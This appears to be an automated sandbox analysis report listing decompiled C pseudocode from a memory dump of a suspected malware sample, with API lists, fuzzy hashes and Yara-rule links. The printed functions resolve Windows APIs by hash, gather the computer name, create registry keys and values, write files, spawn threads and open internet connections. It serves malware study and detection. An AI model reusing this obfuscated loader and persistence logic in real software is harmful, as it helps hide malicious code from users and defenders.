0x000a4c21
0x000a4c3c
0x000a4c42
0x000a4c45
0x000a4c67
0x000a4c79
0x000a4c99
0x000a4ca5
0x000a4cad
0x000a4cb9
0x000a4cbc
0x000a4ce3
0x000a4cec
0x000a4d03
0x000a4d06
0x000a4d0c
0x000a4d11
0x000a4d14
0x000a4d16
0x000a4ec7
0x000a4ec7
0x000a4ec7
0x000a4d1c
0x000a4d21
0x000a4d42
0x000a4d55
0x000a4d66
0x000a4d73
0x000a4d8c
0x000a4da9
0x000a4db0
0x000a4db5
0x000a4db8
0x000a4dba
0x00000000
0x000a4dc0
0x000a4dc0
0x000a4dc6
0x000a4dcd
0x000a4de7
0x000a4dec
0x000a4def
0x000a4df1
0x000a4dfc
0x000a4dfc
0x000a4e00
0x000a4e06
0x000a4e0b
0x000a4e0b
0x000a4e0e
0x000a4e16
0x000a4e18
0x000a4e1f
0x000a4e36
0x000a4e3b
0x000a4e3e
0x000a4e40
0x000a4e48
0x000a4e48
0x000a4e52
0x000a4e5b
0x000a4e60
0x000a4e6d
0x000a4e72
0x000a4e72
0x000a4e75
0x000a4e7a
0x000a4e84
0x000a4e86
0x000a4e8f
0x000a4eb9
0x000a4eb9
0x000a4ebe
0x000a4ec3
0x000a4ec3
0x000a4dba
0x000a4ecc
0x000a4ed4
0x000a4edc
0x000a4ee4
0x000a4eef
0x000a4efa
0x000a4f05
0x000a4f10
0x000a4f1b
0x000a4f26
0x000a4f31
0x000a4f3c
0x000a4f47
0x000a4f4f
0x00000000
0x00000000
0x00000000
0x000a46f2
0x000a4f60

APIs

SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,?), ref: 000A46EE

Part of subcall function 000A5180: CreateDirectoryW.KERNEL32(?,00000000), ref: 000A51F0

Part of subcall function 000921E0: RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00092210

Part of subcall function 0009A5E0: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 0009A620

CreateThread.KERNEL32(00000000,00000000,Function_00015420,00000000,00000000,00000000), ref: 000A4EB9

Part of subcall function 000A9C40: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?), ref: 000A9C6F
Part of subcall function 000A9C40: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 000A9C89

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Create$CloseDirectoryFileFolderFreeHandlePathThreadVirtual
String ID:
API String ID: 1450970588-0
Opcode ID: e47609c2aa1e07dce6eadc5be58084e30b77ab60383782c6dd544ffad4d732f7
Instruction ID: e26f6a2a927ebc3eb0cd91757af0931e6c7052d795acac1f300664f7a469dd9f
Opcode Fuzzy Hash: e47609c2aa1e07dce6eadc5be58084e30b77ab60383782c6dd544ffad4d732f7
Instruction Fuzzy Hash: AD32D3B5E002096BDF10EBE0DC53FFE7269AB51314F540574F819A72C3EE706A098BA2

Uniqueness

Uniqueness Score: -1.00%

Function 000A3BC0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E000A3BC0(intOrPtr __ecx, void* __eflags) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v52;
				char _v86;
				char _v122;
				char _v158;
				char _v196;
				char _v256;
				short _v456;
				char _v574;
				char _v774;
				int _t23;
				void* _t25;
				intOrPtr* _t27;
				void* _t28;
				void* _t30;
				char _t33;
				intOrPtr _t36;
				void* _t38;
				void* _t40;
				signed char _t43;
				char* _t53;
				DWORD* _t59;
				void* _t61;
				void* _t62;
				void* _t66;

				_v24 = __ecx;
				_v20 = 0x64;
				E0009BF50(__eflags, 0, 0x6f6e3c7);
				_t62 = _t61 + 8;
				_t59 =  &_v20;
				_t23 = GetComputerNameW( &_v456, _t59); // executed
				_t81 = _t23;
				if(_t23 == 0) {
					E000A7700( &_v456, E00097200(0xb075e,  &_v122), 0xffffffff);
					_t62 = _t62 + 0x14;
				}
				_v20 = E00099D50(0x647400c8);
				_t25 = E00099D50(0x647400a5);
				_t27 = E0009BF50(_t81, _t25, E00099D50(0x6e1cdffb));
				_t66 = _t62 + 0x14;
				_t53 =  &_v774;
				_t28 =  *_t27(_t53, _t59);
				_t82 = _t28;
				if(_t28 == 0) {
					E000A7700(_t53, E00097200(0xb075e,  &_v52), 0xffffffff);
					_t66 = _t66 + 0x14;
				}
				_t30 = E00097200(0xb0a40,  &_v574);
				_t33 = E00095350(_t82, 0x80000002, _t30, E00097200(0xb0500,  &_v196)); // executed
				_v32 = _t33;
				_t36 = E0009E360(E00097200(0xb07b0,  &_v256), _t82, 0x80000002, _t30, _t35); // executed
				_v28 = _t36;
				_t38 = E00097200(0xb0990,  &_v158);
				_t40 = E000ACC50( &_v32, _t82,  &_v32, 8);
				_push(_t53);
				_push(_t40);
				_t60 = _v24;
				_v20 = E000AD650( &_v456, _v24, 0x65, _t38,  &_v456);
				_t43 = E000955C0(_t42, 0xffffffff);
				if((_t43 & 0x00000001) != 0) {
					return E000A7700(_t60, E00097200(0xb08a0,  &_v86), 0xffffffff);
				}
				return _t43;
			}

0x000a3bcc
0x000a3bcf
0x000a3bdd
0x000a3be2
0x000a3be5
0x000a3bf0
0x000a3bf2
0x000a3bf4
0x000a3c0b
0x000a3c10
0x000a3c10
0x000a3c20
0x000a3c28
0x000a3c41
0x000a3c46
0x000a3c49
0x000a3c51
0x000a3c53
0x000a3c55
0x000a3c6c
0x000a3c71
0x000a3c71
0x000a3c80
0x000a3ca5
0x000a3cad
0x000a3ccb
0x000a3cd3
0x000a3ce2
0x000a3cf2
0x000a3cfa
0x000a3cfb
0x000a3d06
0x000a3d12
0x000a3d18
0x000a3d22
0x00000000
0x000a3d3e
0x000a3d4b

APIs

GetComputerNameW.KERNEL32(?,00000064), ref: 000A3BF0

Strings

d, xrefs: 000A3BCF

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: ComputerName
String ID: d
API String ID: 3545744682-2564639436
Opcode ID: d74ed48a5e45c76f814f9f084625e3bcd4a40715cd98bb2d6d30f83ba29f1bf0
Instruction ID: 4b4a9cf9320b269edf301113e3bbf16b8a91b567772b7bbc5c29563ce441ba0e
Opcode Fuzzy Hash: d74ed48a5e45c76f814f9f084625e3bcd4a40715cd98bb2d6d30f83ba29f1bf0
Instruction Fuzzy Hash: 7F31C3E3C441187AEB11A7A0AC03DFF766C9B12715F050135FD1CA2283FA21AB188BF2

Uniqueness

Uniqueness Score: -1.00%

Function 000A5180, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000A5180(void* __ecx, intOrPtr __edx, char* _a4, char _a8) {
				intOrPtr _v20;
				char _v50;
				short _v52;
				char _v572;
				int _t10;
				void* _t16;
				char* _t20;
				void* _t25;
				WCHAR* _t27;
				void* _t28;
				void* _t29;
				void* _t31;

				_t20 = _a4;
				_t25 = __ecx;
				_v20 = __edx;
				_v52 = 0;
				_t34 = _t20;
				if(_t20 == 0) {
					_t20 =  &_v52;
					_v52 = 0x2e;
					E00095CD0(_t34, 0,  &_v50, 2, 3);
					_t28 = _t28 + 0x10;
				}
				_t27 =  &_v572;
				_t10 = E00091490(2, _t25, _t27, 0, 3, 5); // executed
				_t29 = _t28 + 0x18;
				_t35 = _t10;
				if(_t10 != 0) {
					E0009BF50(_t35, 0, E00099D50(0x677c729b));
					_t31 = _t29 + 0xc;
					_t10 = CreateDirectoryW(_t27, 0); // executed
					if(_t10 != 0) {
						_t37 = _a8;
						if(_a8 != 0) {
							E000A0F60(_t37, _t27, 1, 1); // executed
							_t31 = _t31 + 0xc;
						}
						E000AECC0(E00099D50(0x647401a8));
						_t16 = E00091490(0, _t27, E000AFCF0(_v20), _t20, 3, 5); // executed
						return _t16;
					}
				}
				return _t10;
			}

0x000a518c
0x000a518f
0x000a5191
0x000a5194
0x000a519a
0x000a519c
0x000a519e
0x000a51a1
0x000a51b1
0x000a51b6
0x000a51b6
0x000a51b9
0x000a51c9
0x000a51ce
0x000a51d1
0x000a51d3
0x000a51e5
0x000a51ea
0x000a51f0
0x000a51f4
0x000a51f6
0x000a51fa
0x000a5201
0x000a5206
0x000a5206
0x000a521c
0x000a5231
0x00000000
0x000a5236
0x000a51f4
0x000a5243

APIs

CreateDirectoryW.KERNEL32(?,00000000), ref: 000A51F0

Strings

., xrefs: 000A51A1

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateDirectory
String ID: .
API String ID: 4241100979-248832578
Opcode ID: 3acc9fe88f1adef59864c2781f8d3f52916a3d1e9f74662e92389375f329ca32
Instruction ID: 98b28f1730cafa2b0814f29adbad9fffe3e45810f82169d2cf3611196d2162e0
Opcode Fuzzy Hash: 3acc9fe88f1adef59864c2781f8d3f52916a3d1e9f74662e92389375f329ca32
Instruction Fuzzy Hash: DE1194A5A8031436FB2076D5AC5BFFF766C9F56B55F050024FE087A2C3FAA15A0486E2

Uniqueness

Uniqueness Score: -1.00%

Function 000A58D0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E000A58D0(void* __eax, void* __ecx, void* __edx, void* __eflags, char _a4) {
				char _v17;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v66;
				char _v124;
				char _v238;
				char _v1278;
				char _v1794;
				void* __esi;
				signed char _t35;
				signed char _t37;
				void* _t38;
				intOrPtr* _t40;
				signed char _t44;
				intOrPtr* _t45;
				signed char _t47;
				intOrPtr _t50;
				void* _t51;
				void* _t52;
				signed int _t53;
				void* _t54;
				intOrPtr* _t56;
				intOrPtr* _t57;
				intOrPtr _t63;
				void* _t64;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;
				intOrPtr _t88;
				void* _t89;
				void* _t90;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t103;
				void* _t105;
				void* _t107;
				void* _t108;
				void* _t112;
				void* _t113;
				void* _t116;

				_t116 = __eflags;
				_push(__eax);
				_t1 =  &_a4; // 0xa37e6
				_t86 = __edx;
				_t69 = __ecx;
				_v17 =  *_t1;
				_t89 = L0009C1E0(0x1c);
				E000AED20(_t30);
				L000AFA50(_t89, _t69);
				_t3 = _t89 + 0xc; // 0xc
				_t77 = _t3;
				L000AFA50(_t3, __edx);
				 *((char*)(_t89 + 0x18)) = _v17;
				_t35 = E000A9AC0(_t116, 0xffffffff); // executed
				_t37 = E00094350(_t35 & 0x000000ff, 4);
				_t98 = _t95 + 0x10;
				_t117 = _t37 & 0x00000001;
				if((_t37 & 0x00000001) != 0) {
					_t77 = _t89;
					_t98 = _t98 + 4;
					_pop(_t89);
					_pop(_t86);
					_pop(_t69);
					_pop(_t93);
					_t90 = _t77;
					_t38 = E000AFCF0(_t77 + 0xc);
					_t87 =  &_v1794;
					E000A7700(_t87, _t38, 0xffffffff);
					_t40 = E0009BF50(_t117, 3, 0x5ea9ec7);
					 *_t40(_t87, _t89, _t86, _t69, _t93);
					_t44 = E00094350(E000A9AC0(_t117, 0xffffffff) & 0x000000ff, 4);
					_t103 = _t98 - 0x6f4 + 0x20;
					if((_t44 & 0x00000001) != 0) {
						_t45 = E0009BF50(__eflags, 9, 0x28243c7);
						_t70 =  *_t45(0, 0, 2);
						_t47 = E0009A500(__eflags, _t46, 0);
						_t105 = _t103 + 0x10;
						__eflags = _t47 & 0x00000001;
						if((_t47 & 0x00000001) == 0) {
							__eflags =  *((char*)(_t90 + 0x18));
							_v24 = _t70;
							if( *((char*)(_t90 + 0x18)) == 0) {
								E000A7700( &_v1278, _t87, 0xffffffff);
								_t107 = _t105 + 0xc;
							} else {
								E000AD650(E00097200(0xb0840,  &_v66),  &_v1278, 0x208, _t60, _t87);
								_t107 = _t105 + 0x18;
							}
							_t50 = E0009BF50(__eflags, 9, 0x42453f7);
							_t108 = _t107 + 8;
							_v28 = _t50;
							_t51 = E000AFCF0(_t90);
							_t52 = E000AFCF0(_t90);
							_t88 = _v24;
							_t53 = _v28(_t88, _t52, _t51, 0xf01ff, 0x110, 2, 0,  &_v1278, 0, 0, 0, 0, 0);
							__eflags = _t53;
							if(__eflags != 0) {
								_t57 = E0009BF50(__eflags, 9, 0x48eed75);
								_t108 = _t108 + 8;
								 *_t57(_t53);
							}
							_t54 = E00099D50(0x647400a5);
							_t56 = E0009BF50(__eflags, _t54, E00099D50(0x60faedd9));
							_t105 = _t108 + 0x10;
							_t47 =  *_t56(_t88);
						}
					} else {
						_t63 = E00097200(0xb0c50,  &_v238);
						_t112 = _t103 + 8;
						_t119 =  *((char*)(_t90 + 0x18));
						_v24 = _t63;
						if( *((char*)(_t90 + 0x18)) == 0) {
							_t64 = E0009BA30(__eflags, _t87);
							_t113 = _t112 + 4;
						} else {
							_t67 = E00097200(0xb0840,  &_v124);
							_t68 = E00099D50(0x647402a4);
							_t84 =  &_v1278;
							_t87 =  &_v1278;
							_t64 = E000AD650(_t68, _t84, _t68, _t67,  &_v1278);
							_t113 = _t112 + 0x1c;
						}
						_t47 = E000A2450(_t119, 0x80000001, _v24, E000AFCF0(_t90), _t87, _t64);
						_t105 = _t113 + 0x14;
					}
					return _t47;
				} else {
					__eax = E0009BF50(__eflags, 0, 0xa0733d4);
					__eax = CreateThread(0, 0, E0009BE30, __esi, 0, 0); // executed
					__esp = __esp + 4;
					return __eax;
				}
			}

0x000a58d0
0x000a58d6
0x000a58d7
0x000a58da
0x000a58dc
0x000a58de
0x000a58ed
0x000a58ef
0x000a58f7
0x000a58fc
0x000a58fc
0x000a5900
0x000a5908
0x000a590d
0x000a591b
0x000a5920
0x000a5923
0x000a5925
0x000a594e
0x000a5950
0x000a5953
0x000a5954
0x000a5955
0x000a5956
0x000a223c
0x000a2241
0x000a2246
0x000a2250
0x000a225f
0x000a2268
0x000a227a
0x000a227f
0x000a2284
0x000a22e4
0x000a22f4
0x000a22f9
0x000a22fe
0x000a2301
0x000a2303
0x000a2309
0x000a230d
0x000a2310
0x000a236f
0x000a2374
0x000a2312
0x000a2331
0x000a2336
0x000a2336
0x000a237e
0x000a2383
0x000a2388
0x000a238b
0x000a2394
0x000a23ba
0x000a23be
0x000a23c1
0x000a23c3
0x000a23ce
0x000a23d3
0x000a23d7
0x000a23d7
0x000a23de
0x000a23f7
0x000a23fc
0x000a2400
0x000a2400
0x000a2286
0x000a2292
0x000a2297
0x000a229a
0x000a229e
0x000a22a1
0x000a233c
0x000a2341
0x000a22a7
0x000a22b0
0x000a22bf
0x000a22c7
0x000a22d1
0x000a22d3
0x000a22d8
0x000a22d8
0x000a2358
0x000a235d
0x000a235d
0x000a240c
0x000a5927
0x000a592e
0x000a5944
0x000a5946
0x000a594d
0x000a594d

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0000BE30,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 000A5944

Strings

7, xrefs: 000A58D7

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateThread
String ID: 7
API String ID: 2422867632-2497961398
Opcode ID: 53359471cf68dd602f82b61dd4ba48720037d418cabb661f57922f2fe40ad8d7
Instruction ID: 7b4959f3ddd8a6a0327100069a87490279bf89a23305e98a9d85f32ef9685855
Opcode Fuzzy Hash: 53359471cf68dd602f82b61dd4ba48720037d418cabb661f57922f2fe40ad8d7
Instruction Fuzzy Hash: DE01F7A6B8425436E92061E93C13FFF7A584B92B75F080075FA5D9A2C3E8416614A2F3

Uniqueness

Uniqueness Score: -1.00%

Function 000A9600, Relevance: 3.1, APIs: 2, Instructions: 93
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E000A9600(void* __eax, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v20;
				long _t8;
				long _t9;
				long _t10;
				void* _t11;
				intOrPtr* _t20;
				int _t22;
				signed char _t24;
				long _t25;
				void* _t28;
				void* _t30;
				void* _t31;
				void* _t35;

				_push(__eax);
				E0009BF50(__eflags, 0, 0xad68947);
				_t8 = E00099D50(0x247400ac);
				_t9 = E00099D50(0x647400ae);
				_t10 = E00099D50(0x6474002c);
				_t35 = _t31 + 0x14;
				_t11 = CreateFileW(_a4, _t8, 1, 0, _t9, _t10, 0); // executed
				if(_t11 == 0xffffffff) {
					_t24 = 0;
					L9:
					return E00093660(_t46, E00095080(_t46, 0x48, E00092FE0(_t11, _t46, 0x48, 0xff) & 0x000000ff) & _t24 & 0x000000ff, 0) & 0x00000001;
				}
				_t28 = _a8;
				_t30 = _t11;
				if(_t28 == 0) {
					L4:
					_t24 = 1;
					L7:
					_t20 = E0009BF50(_t45, 0, E00099D50(0x6ffa7d19));
					_t35 = _t35 + 0xc;
					_t11 =  *_t20(_t30);
					_t46 = _t24;
					if(_t24 == 0) {
						_t11 = E000AAE30(_t46, _a4);
						_t35 = _t35 + 4;
					}
					goto L9;
				}
				_t25 = _a12;
				_t44 = _t25;
				if(_t25 == 0) {
					goto L4;
				}
				E0009BF50(_t44, 0, 0xabb2b5);
				_t35 = _t35 + 8;
				_t22 = WriteFile(_t30, _t28, _t25,  &_v20, 0); // executed
				_t45 = _t22;
				if(_t22 == 0) {
					_t24 = 0;
					__eflags = 0;
					goto L7;
				}
				goto L4;
			}

0x000a9606
0x000a960e
0x000a961d
0x000a962c
0x000a963b
0x000a9640
0x000a964f
0x000a9654
0x000a9688
0x000a96b8
0x000a96ee
0x000a96ee
0x000a9656
0x000a9659
0x000a965d
0x000a9684
0x000a9684
0x000a968e
0x000a969e
0x000a96a3
0x000a96a7
0x000a96a9
0x000a96ab
0x000a96b0
0x000a96b5
0x000a96b5
0x00000000
0x000a96ab
0x000a965f
0x000a9662
0x000a9664
0x00000000
0x00000000
0x000a966d
0x000a9672
0x000a967e
0x000a9680
0x000a9682
0x000a968c
0x000a968c
0x00000000
0x000a968c
0x00000000

APIs

CreateFileW.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 000A964F
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,00000000,00000000,?,?,00000000), ref: 000A967E

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: File$CreateWrite
String ID:
API String ID: 2263783195-0
Opcode ID: bfeb5540bc80b74d15f1affca5b21e5282fa28de42bf632360cdcd3cb50a2787
Instruction ID: 5c71efaef33510c642e86e5f8567699476e48a8fd670ed4884abaec6fda91150
Opcode Fuzzy Hash: bfeb5540bc80b74d15f1affca5b21e5282fa28de42bf632360cdcd3cb50a2787
Instruction Fuzzy Hash: 0E2196E6A802053AEE1125B46C53FBE31488FA2759F1A0434FE085A283F9929A1856B3

Uniqueness

Uniqueness Score: -1.00%

Function 000AB790, Relevance: 3.1, APIs: 2, Instructions: 91
networkCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E000AB790(void* __eflags, intOrPtr _a4, char* _a8, signed short _a12, signed int _a16) {
				void* _t10;
				void* _t12;
				intOrPtr* _t14;
				signed int _t18;
				void* _t19;
				void* _t20;
				intOrPtr* _t22;
				intOrPtr _t30;
				signed int _t31;
				char* _t32;
				void* _t36;
				void* _t37;
				void* _t38;

				_t30 = _a4;
				E0009BF50(__eflags, 0x13, 0xd0ca371);
				_t38 = _t37 + 8;
				_t26 =  !=  ? _t30 : 0xb0580;
				_t10 = InternetOpenA( !=  ? _t30 : 0xb0580,  !_a16 & 0x00000001, 0, 0, 0); // executed
				if(_t10 == 0) {
					L6:
					return 0;
				}
				_t36 = _t10;
				_t31 = 0;
				do {
					_t12 = E00099D50(0x647400bf);
					_t14 = E0009BF50(0, _t12, E00099D50(0x61c0d6ad));
					 *_t14(_t36,  *((intOrPtr*)(0xb07fc + _t31 * 8)), 0xb0800 + _t31 * 8, 4);
					_t18 = E00091460(0, E000922E0(0, _t31, 0x6ac13eca) + 1, 0x6ac13eca);
					_t38 = _t38 + 0x20;
					_t31 = _t18;
					_t50 = _t18 - 3;
				} while (_t18 != 3);
				_t32 = _a8;
				_t19 = E0009ABC0(_t50, _t32);
				_t20 = 0;
				_t51 = _t19;
				if(_t19 > 0) {
					E0009BF50(_t51, 0x13, 0xae775e1);
					_t20 = InternetConnectA(_t36, _t32, _a12 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
					if(0 == 0) {
						_t22 = E0009BF50(0, 0x13, 0x714b685);
						 *_t22(_t36);
						goto L6;
					}
				}
				return _t20;
			}

0x000ab799
0x000ab7a5
0x000ab7aa
0x000ab7b7
0x000ab7c2
0x000ab7c6
0x000ab87a
0x00000000
0x000ab87a
0x000ab7cc
0x000ab7ce
0x000ab7d0
0x000ab7d5
0x000ab7ee
0x000ab808
0x000ab81f
0x000ab824
0x000ab827
0x000ab829
0x000ab829
0x000ab82e
0x000ab832
0x000ab83c
0x000ab83e
0x000ab840
0x000ab849
0x000ab862
0x000ab866
0x000ab86f
0x000ab878
0x00000000
0x000ab878
0x000ab866
0x000ab880

APIs

InternetOpenA.WININET(000B0580,?,00000000,00000000,00000000,?,0009CD77,?,?,?,00000001,00000000,?,0009CD77,?,00000001), ref: 000AB7C2
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00000004), ref: 000AB862

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Internet$ConnectOpen
String ID:
API String ID: 2790792615-0
Opcode ID: c710bd5e375eb3946b5df87314f6134a6c14a58f37a832ce665747257abeea6c
Instruction ID: a3e35fedb128c82c0eec56d3c8d5161dcb093d70ff9315ceccde59e533e68921
Opcode Fuzzy Hash: c710bd5e375eb3946b5df87314f6134a6c14a58f37a832ce665747257abeea6c
Instruction Fuzzy Hash: 5E21EEB6B4020536FE2066757C23FBF35498B92759F150034FA09A6183FE91EA0155B2

Uniqueness

Uniqueness Score: -1.00%

Function 000921E0, Relevance: 3.1, APIs: 2, Instructions: 89
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E000921E0(intOrPtr _a4, void* _a8, short* _a12, short* _a16, signed char _a20, signed char _a24) {
				void* _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				int _v36;
				long _t20;
				int _t25;
				long _t26;
				intOrPtr* _t27;
				intOrPtr* _t30;
				long _t32;
				long _t33;
				void* _t42;
				void* _t43;
				void* _t47;

				E0009BF50(_t47, 9, 0x7b43ce7);
				_t43 = _t42 + 8;
				_t20 = RegCreateKeyExW(_a8, _a12, 0, 0, 0, 4, 0,  &_v20, 0); // executed
				if(_t20 == 0) {
					_t32 = 0x64;
					_v28 = _a24 & 0x000000ff;
					_v24 = _a20 & 0x000000ff;
					do {
						E00095CD0(__eflags, _a4, _a16, _v24, _v28);
						E0009BF50(__eflags, 9, 0x7b43ce7);
						_t25 = E00099D50(0x647400af);
						_t43 = _t43 + 0x1c;
						_t26 = RegCreateKeyExW(_v20, _a16, 0, 0, 0, _t25, 0,  &_v32,  &_v36); // executed
						__eflags = _t26;
						if(__eflags != 0) {
							goto L3;
						} else {
							_t30 = E0009BF50(__eflags, 9, 0x3111c69);
							_t43 = _t43 + 8;
							 *_t30(_v32);
							__eflags = _v36 - 1;
							if(__eflags != 0) {
								goto L3;
							} else {
								_t33 = 1;
							}
						}
						L8:
						_t27 = E0009BF50(__eflags, 9, 0x3111c69);
						 *_t27(_v20);
						goto L9;
						L3:
						_t32 = _t32 - 1;
						__eflags = _t32;
					} while (__eflags != 0);
					_t33 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t33 = 0;
				}
				L9:
				return _t33;
			}

0x000921f6
0x000921fb
0x00092210
0x00092214
0x00092225
0x0009222a
0x0009222d
0x00092243
0x00092250
0x0009225f
0x00092271
0x00092276
0x0009228e
0x00092290
0x00092292
0x00000000
0x00092294
0x0009229b
0x000922a0
0x000922a6
0x000922a8
0x000922ac
0x00000000
0x000922ae
0x000922ae
0x000922ae
0x000922ac
0x000922b4
0x000922bb
0x000922c6
0x00000000
0x00092240
0x00092240
0x00092240
0x00092240
0x000922b2
0x000922b2
0x00000000
0x00092216
0x00092216
0x00092216
0x000922c8
0x000922d1

APIs

RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00092210
RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0009228E

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c21274959b6386e64019958d2eec60caeb902cba88aa17351dd5b120125669bc
Instruction ID: fb471403ba7db389b86e66c56b0c3150b843541ae7cfc357d9a195603fbaec2f
Opcode Fuzzy Hash: c21274959b6386e64019958d2eec60caeb902cba88aa17351dd5b120125669bc
Instruction Fuzzy Hash: E92186B2A403197FEF21AB909D53FFE7664AB15B10F140034FA14762D2E6A1A924E6B1

Uniqueness

Uniqueness Score: -1.00%

Function 000A3D80, Relevance: 3.1, APIs: 2, Instructions: 72
registryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E000A3D80(void* __eflags, void* _a4, short* _a8, short* _a12, int _a16, char* _a20, int _a24) {
				void* _t12;
				signed char _t13;
				void* _t14;
				long _t17;
				void* _t18;
				signed int _t21;
				intOrPtr* _t22;
				char* _t28;
				signed int _t29;

				_t44 = __eflags;
				_t13 = E000A5000(_t12, __eflags, 0xffffffff);
				_t14 = E00099D50(0x647400a5);
				E0009BF50(_t44, _t14, E00099D50(0x63c03c4b));
				_t17 = RegCreateKeyExW(_a4, _a8, 0, 0, 0, (_t13 & 0x000000ff) << 0x00000008 | 0x00000002, 0,  &_a4, 0); // executed
				if(_t17 == 0) {
					_t28 = _a20;
					_t18 = E00099D50(0x647400a5);
					E0009BF50(__eflags, _t18, E00099D50(0x69a6701b));
					_t21 = RegSetValueExW(_a4, _a12, 0, _a16, _t28, _a24); // executed
					__eflags = _t21;
					_t10 = _t21 == 0;
					__eflags = _t10;
					_t29 = _t28 & 0xffffff00 | _t10;
					_t22 = E0009BF50(_t10, 9, 0x3111c69);
					 *_t22(_a4);
				} else {
					_t29 = 0;
				}
				return _t29;
			}

0x000a3d80
0x000a3d8b
0x000a3da1
0x000a3dba
0x000a3dd5
0x000a3dd9
0x000a3ddf
0x000a3dea
0x000a3e03
0x000a3e18
0x000a3e1a
0x000a3e1c
0x000a3e1c
0x000a3e1c
0x000a3e26
0x000a3e31
0x000a3ddb
0x000a3ddb
0x000a3ddb
0x000a3e39

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,?,00000002,?,00000000), ref: 000A3DD5
RegSetValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 000A3E18

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateValue
String ID:
API String ID: 2259555733-0
Opcode ID: 96e8cb35c373eb8ba011f26dd568d909fbde63113441cb5beea8bdcf5d9670c8
Instruction ID: 34f914742957e9b3a923979f7d0b4f0d0f3ef5a07ae0aaef82da9af9b250b3e3
Opcode Fuzzy Hash: 96e8cb35c373eb8ba011f26dd568d909fbde63113441cb5beea8bdcf5d9670c8
Instruction Fuzzy Hash: 3E1106B69002443FEF116AA4AC93FEF360CDB52769F150034FE1895293E651EA2496F3

Uniqueness

Uniqueness Score: -1.00%

Function 0009AD80, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0009AD80(void* __eflags, intOrPtr _a4, void* _a8) {
				void* _v16;
				long _v20;
				void* _t10;
				intOrPtr* _t12;
				void* _t13;
				void* _t15;
				int _t19;
				void* _t24;
				void* _t26;
				void* _t27;
				void* _t30;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v20 = 0;
				_v16 = 0;
				_t10 = E00099D50(0x647400a5);
				_t12 = E0009BF50(_t33, _t10, E00099D50(0x6b5f7e12));
				_t30 = _t27 + 0x10;
				_t13 =  *_t12(_a4, 8,  &_v16);
				_t34 = _t13;
				if(_t13 == 0) {
					_t26 = 0;
					__eflags = 0;
					L7:
					return _t26;
				}
				_t24 = _a8;
				_t15 = E000AB530(_t13, _t34, _v16); // executed
				_t31 = _t30 + 4;
				_t26 = _t15;
				if(_t24 != 0) {
					_t36 = _t26;
					if(_t26 != 0) {
						E0009BF50(_t36, 9, 0xbd557e);
						_t31 = _t31 + 8;
						_t19 = GetTokenInformation(_v16, 0xc, _t24, 4,  &_v20); // executed
						if(_t19 == 0) {
							E0009B570(_t26);
							_t31 = _t31 + 4;
							_t26 = 0;
						}
					}
				}
				E0009BF50(0, 0, 0xb8e7db5);
				CloseHandle(_v16); // executed
				goto L7;
			}

0x0009ad80
0x0009ad8b
0x0009ad92
0x0009ad9e
0x0009adb7
0x0009adbc
0x0009adc6
0x0009adc8
0x0009adca
0x0009ae26
0x0009ae26
0x0009ae28
0x0009ae30
0x0009ae30
0x0009adcc
0x0009add2
0x0009add7
0x0009adda
0x0009adde
0x0009ade0
0x0009ade2
0x0009adeb
0x0009adf0
0x0009adff
